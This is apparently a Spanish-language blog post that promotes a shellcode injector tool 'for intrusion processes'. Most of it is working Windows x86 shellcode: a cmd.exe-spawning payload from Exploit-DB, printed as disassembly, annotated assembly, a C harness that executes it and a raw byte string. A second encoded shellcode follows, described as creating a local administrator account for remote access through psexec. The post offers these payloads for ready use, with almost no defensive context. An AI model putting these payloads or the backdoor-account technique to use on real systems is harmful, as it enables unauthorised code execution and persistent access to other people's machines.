Buenas a todos, durante estas semanas hemos estado viendo el funcionamiento de Remote Shellcode Injector, una simple pero útil herramienta para vuestros procesos de intrusión.
Recordad que simplemente debemos modificar en la variable "sc" el contenido de la shellcode, ¡nada más!
Saludos!
Hoy quería jugar con vosotros con algunas shellcodes publicadas en Exploit-DB cómo la siguiente, con la que ejecutaremos una consola de comandos:
/*
# Title : Windows x86 CreateProcessA(NULL,"cmd.exe",NULL,NULL,0,NULL,NULL,NULL,&STARTUPINFO,&PROCESS_INFORMATION) shellcode
# Author : Roziul Hasan Khan Shifat
# Date : 15-08-2016
# Tested On : Windows 7 x86
*/
/*
Disassembly of section .text:
00000000 <_start>:
0: 31 c9 xor %ecx,%ecx
2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax
6: 8b 40 0c mov 0xc(%eax),%eax
9: 8b 70 14 mov 0x14(%eax),%esi
c: ad lods %ds:(%esi),%eax
d: 96 xchg %eax,%esi
e: ad lods %ds:(%esi),%eax
f: 8b 48 10 mov 0x10(%eax),%ecx
12: 31 db xor %ebx,%ebx
14: 8b 59 3c mov 0x3c(%ecx),%ebx
17: 01 cb add %ecx,%ebx
19: 8b 5b 78 mov 0x78(%ebx),%ebx
1c: 01 cb add %ecx,%ebx
1e: 8b 73 20 mov 0x20(%ebx),%esi
21: 01 ce add %ecx,%esi
23: 31 d2 xor %edx,%edx
00000025 <func>:
25: 42 inc %edx
26: ad lods %ds:(%esi),%eax
27: 01 c8 add %ecx,%eax
29: 81 38 47 65 74 50 cmpl $0x50746547,(%eax)
2f: 75 f4 jne 25 <func>
31: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax)
38: 75 eb jne 25 <func>
3a: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax)
41: 75 e2 jne 25 <func>
43: 8b 73 1c mov 0x1c(%ebx),%esi
46: 01 ce add %ecx,%esi
48: 8b 14 96 mov (%esi,%edx,4),%edx
4b: 01 ca add %ecx,%edx
4d: 89 d6 mov %edx,%esi
4f: 89 cf mov %ecx,%edi
51: 31 db xor %ebx,%ebx
53: 68 79 41 41 41 push $0x41414179
58: 66 89 5c 24 01 mov %bx,0x1(%esp)
5d: 68 65 6d 6f 72 push $0x726f6d65
62: 68 65 72 6f 4d push $0x4d6f7265
67: 68 52 74 6c 5a push $0x5a6c7452
6c: 54 push %esp
6d: 51 push %ecx
6e: ff d2 call *%edx
70: 83 c4 10 add $0x10,%esp
73: 31 c9 xor %ecx,%ecx
75: 89 ca mov %ecx,%edx
77: b2 54 mov $0x54,%dl
79: 51 push %ecx
7a: 83 ec 54 sub $0x54,%esp
7d: 8d 0c 24 lea (%esp),%ecx
80: 51 push %ecx
81: 52 push %edx
82: 51 push %ecx
83: ff d0 call *%eax
85: 59 pop %ecx
86: 31 d2 xor %edx,%edx
88: 68 73 41 42 42 push $0x42424173
8d: 66 89 54 24 02 mov %dx,0x2(%esp)
92: 68 6f 63 65 73 push $0x7365636f
97: 68 74 65 50 72 push $0x72506574
9c: 68 43 72 65 61 push $0x61657243
a1: 8d 14 24 lea (%esp),%edx
a4: 51 push %ecx
a5: 52 push %edx
a6: 57 push %edi
a7: ff d6 call *%esi
a9: 59 pop %ecx
aa: 83 c4 10 add $0x10,%esp
ad: 31 db xor %ebx,%ebx
af: 68 65 78 65 41 push $0x41657865
b4: 88 5c 24 03 mov %bl,0x3(%esp)
b8: 68 63 6d 64 2e push $0x2e646d63
bd: 8d 1c 24 lea (%esp),%ebx
c0: 31 d2 xor %edx,%edx
c2: b2 44 mov $0x44,%dl
c4: 89 11 mov %edx,(%ecx)
c6: 8d 51 44 lea 0x44(%ecx),%edx
c9: 56 push %esi
ca: 31 f6 xor %esi,%esi
cc: 52 push %edx
cd: 51 push %ecx
ce: 56 push %esi
cf: 56 push %esi
d0: 56 push %esi
d1: 56 push %esi
d2: 56 push %esi
d3: 56 push %esi
d4: 53 push %ebx
d5: 56 push %esi
d6: ff d0 call *%eax
d8: 5e pop %esi
d9: 83 c4 08 add $0x8,%esp
dc: 31 db xor %ebx,%ebx
de: 68 65 73 73 41 push $0x41737365
e3: 88 5c 24 03 mov %bl,0x3(%esp)
e7: 68 50 72 6f 63 push $0x636f7250
ec: 68 45 78 69 74 push $0x74697845
f1: 8d 1c 24 lea (%esp),%ebx
f4: 53 push %ebx
f5: 57 push %edi
f6: ff d6 call *%esi
f8: 31 c9 xor %ecx,%ecx
fa: 51 push %ecx
fb: ff d0 call *%eax
*/
/*
section .text
global _start
_start:
xor ecx,ecx
mov eax,[fs:ecx+0x30] ;PEB
mov eax,[eax+0xc] ;PEB->ldr
mov esi,[eax+0x14] ;PEB->ldr.InMemOrderModuleList
lodsd
xchg esi,eax
lodsd
mov ecx,[eax+0x10] ;kernel32 base address
xor ebx,ebx
mov ebx,[ecx+0x3c] ;DOS->elf_anew
add ebx,ecx ;PE HEADER
mov ebx,[ebx+0x78] ;DataDirectory->VirtualAddress
add ebx,ecx ;IMAGE_EXPORT_DIRECTORY
mov esi,[ebx+0x20] ;AddressOfNames
add esi,ecx
;---------------------------------------------
xor edx,edx
func:
inc edx
lodsd
add eax,ecx
cmp dword [eax],'GetP'
jnz func
cmp dword [eax+4],'rocA'
jnz func
cmp dword [eax+8],'ddre'
jnz func
;--------------------------------
mov esi,[ebx+0x1c] ;AddressOfFunctions
add esi,ecx
mov edx,[esi+edx*4]
add edx,ecx ;GetProcAddress()
;-------------------------------------
mov esi,edx
mov edi,ecx
;-------------------------
xor ebx,ebx
;finding address of RtlZeroMemory()
push 0x41414179
mov [esp+1],word bx
push 0x726f6d65
push 0x4d6f7265
push 0x5a6c7452
push esp
push ecx
call edx
;------------------------------
add esp,16
;-----------------------------------
;zero out 84 bytes
xor ecx,ecx
mov edx,ecx
mov dl,84
push ecx
sub esp,84
lea ecx,[esp]
push ecx
push edx
push ecx
call eax
;----------------------------
;finding address of CreateProcessA()
pop ecx
xor edx,edx
push 0x42424173
mov [esp+2],word dx
push 0x7365636f
push 0x72506574
push 0x61657243
lea edx,[esp]
push ecx
push edx
push edi
call esi
;--------------------------------
;CreateProcessA(NULL,"cmd.exe",NULL,NULL,0,NULL,NULL,NULL,&STARTUPINFO,&PROCESS_INFORMATION)
pop ecx
add esp,16
xor ebx,ebx
push 0x41657865
mov [esp+3],byte bl
push 0x2e646d63
lea ebx,[esp]
xor edx,edx
mov dl,68
mov [ecx],edx
lea edx,[ecx+68]
push esi ;
xor esi,esi
push edx
push ecx
push esi
push esi
push esi
push esi
push esi
push esi
push ebx
push esi
call eax
pop esi
;-------------------------------------
;finding address of ExitProcess()
add esp,8
xor ebx,ebx
push 0x41737365
mov [esp+3],byte bl
push 0x636f7250
push 0x74697845
lea ebx,[esp]
push ebx
push edi
call esi
xor ecx,ecx
push ecx
call eax
*/
#include<stdio.h>
#include<string.h>
char
shellcode[]=\
"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x31\xdb\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xd6\x89\xcf\x31\xdb\x68\x79\x41\x41\x41\x66\x89\x5c\x24\x01\x68\x65\x6d\x6f\x72\x68\x65\x72\x6f\x4d\x68\x52\x74\x6c\x5a\x54\x51\xff\xd2\x83\xc4\x10\x31\xc9\x89\xca\xb2\x54\x51\x83\xec\x54\x8d\x0c\x24\x51\x52\x51\xff\xd0\x59\x31\xd2\x68\x73\x41\x42\x42\x66\x89\x54\x24\x02\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x8d\x14\x24\x51\x52\x57\xff\xd6\x59\x83\xc4\x10\x31\xdb\x68\x65\x78\x65\x41\x88\x5c\x24\x03\x68\x63\x6d\x64\x2e\x8d\x1c\x24\x31\xd2\xb2\x44\x89\x11\x8d\x51\x44\x56\x31\xf6\x52\x51\x56\x56\x56\x56\x56\x56\x53\x56\xff\xd0\x5e\x83\xc4\x08\x31\xdb\x68\x65\x73\x73\x41\x88\x5c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x1c\x24\x53\x57\xff\xd6\x31\xc9\x51\xff\xd0"
;
main()
{
printf
(
"shellcode lenght %ld\n"
,(
long
)
strlen
(shellcode));
(* (
int
(*)()) shellcode) ();
}
Aquí vemos un ejemplo de su ejecución:
Muy útil también es crearnos un usuario administrador local, con el que podamos acceder remotamente a través de psexec por ejemplo, cómo en este otro ejemplo que tenemos a continuación:
"\xda\xde\xd9\x74\x24\xf4\xb8\x22\xd2\x27\x7a\x29\xc9\xb1\x4b"
"\x5b\x31\x43\x1a\x83\xeb\xfc\x03\x43\x16\xe2\xd7\x3b\xbc\x7a"
"\x17\xbc\x95\x4b\xd7\xd8\x92\xec\xe7\xa5\x65\x94\x08\x2d\x25"
"\x69\x9d\x41\xba\xdc\x2a\xe1\xca\xf7\x25\xe2\xca\x07\xbe\xa2"
"\xfe\x8a\x80\x5e\x74\xd4\x3c\xc1\x49\xb5\xb7\x91\x69\x12\x4c"
"\x2c\x4e\xd1\x06\xaa\xd6\xe4\x4c\x3f\x6c\xff\x1b\x1a\x51\xfe"
"\xf0\x78\xa5\x49\x8d\x4b\x4d\x48\x7f\x82\xae\x7a\xbf\x19\xfc"
"\xf9\xff\x96\xfa\xc0\x30\x5b\x04\x04\x25\x90\x3d\xf6\x9d\x71"
"\x37\xe7\x56\xdb\x93\xe6\x83\xba\x50\xe4\x18\xc8\x3d\xe9\x9f"
"\x25\x4a\x15\x14\xb8\xa5\x9f\x6e\x9f\x29\xc1\xad\x72\x01\x53"
"\xd9\x27\x5d\xac\xe6\xb1\xa5\xd2\xdc\xca\xa9\xd4\xdc\x4b\x6e"
"\xd0\xdc\x4b\x71\xe0\x12\x3e\x97\xd1\x42\xd8\x57\xd6\x92\x43"
"\xa9\x5c\x9c\x0d\x8e\x83\xd3\x70\xc2\x4c\x13\x73\x1b\xc4\xf6"
"\x9b\x43\x29\x07\xa4\xfd\x17\x1c\xb9\xa0\x1a\x9f\x3a\xd4\xd4"
"\xde\x82\xee\x16\xe0\x04\x07\xa0\x1f\xfb\x28\x26\xd1\x5f\xe6"
"\x79\xbd\x0c\xf7\x2f\x39\x82\xc7\x80\xbe\xb1\xcf\xc8\xad\xc5"
"\x2f\xf7\x4e\x57\xb4\x26\xf5\xdf\x51\x17\xda\x7c\xba\x39\x41"
"\xf7\x9a\xb0\xfa\x92\xa8\x1a\x8f\x39\x2e\x2e\x06\xa6\x80\xf0"
"\xb5\x16\x8f\x9b\x65\x78\x2e\x38\x01\xa6\x96\xe6\xe9\xc8\xb3"
"\x92\xc9\x78\x53\x38\x68\xed\xcc\xcc\x05\x98\x62\x11\xb8\x06"
"\xee\x38\x54\xae\x83\xce\xda\x51\x10\x40\x68\xe1\xf8\xed\xe9"
"\x66\x8c\x78\x95\x58\x4e\x54\x34\xfd\xea\xaa"
;
Recordad que simplemente debemos modificar en la variable "sc" el contenido de la shellcode, ¡nada más!
Saludos!